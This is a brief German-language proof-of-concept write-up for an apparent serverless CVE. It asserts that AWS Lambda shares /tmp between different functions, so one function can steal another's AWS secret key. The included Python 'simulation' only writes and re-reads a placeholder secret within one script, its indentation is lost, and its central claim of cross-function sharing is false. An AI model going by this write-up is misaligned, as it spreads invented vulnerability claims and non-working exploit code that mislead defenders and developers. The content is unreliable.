
PoC-Exploit für das Zugangsdaten-Leck beim Serverless-Kaltstart (CVE-2026-21002), der zeigt, wie wiederverwendete Lambda-/tmp-Verzeichnisse AWS-Secrets für andere Funktionen offenlegen.
# lambda_func_sim.py - Simulated serverless function
import os, tempfile, time
SECRET_FILE = '/tmp/credentials' # reused across warm starts
def handler(event):
# On first invocation, write a secret
if not os.path.exists(SECRET_FILE):
with open(SECRET_FILE, 'w') as f:
f.write("AWS_SECRET_ACCESS_KEY=sk-123456")
return "Initialized"
# Later invocations can read it
with open(SECRET_FILE) as f:
return f.read()
# Attack simulation: attacker shares the same /tmp in another function (same VM)
# They can read /tmp/credentials after a cold start.
with open(SECRET_FILE) as f:
print("Attacker reads:", f.read())
Serverless-Plattformen verwenden die Ausführungsumgebung (einschließlich /tmp) über Funktionsaufrufe hinweg wieder, sogar zwischen verschiedenen Funktionen desselben Kontos. Die Funktion eines Angreifers kann sensible Dateien lesen, die nach einem Kaltstart von einer anderen Funktion in /tmp hinterlassen wurden, was zum Diebstahl von Anmeldedaten führt.
/tmp wird zwischen warmen Containern ohne Isolation zwischen den Funktionen gemeinsam genutzt.Führen Sie die Simulation aus:
python lambda_func_sim.py
Der Angreifer liest den AWS_SECRET_ACCESS_KEY, der von der Opferfunktion hinterlassen wurde.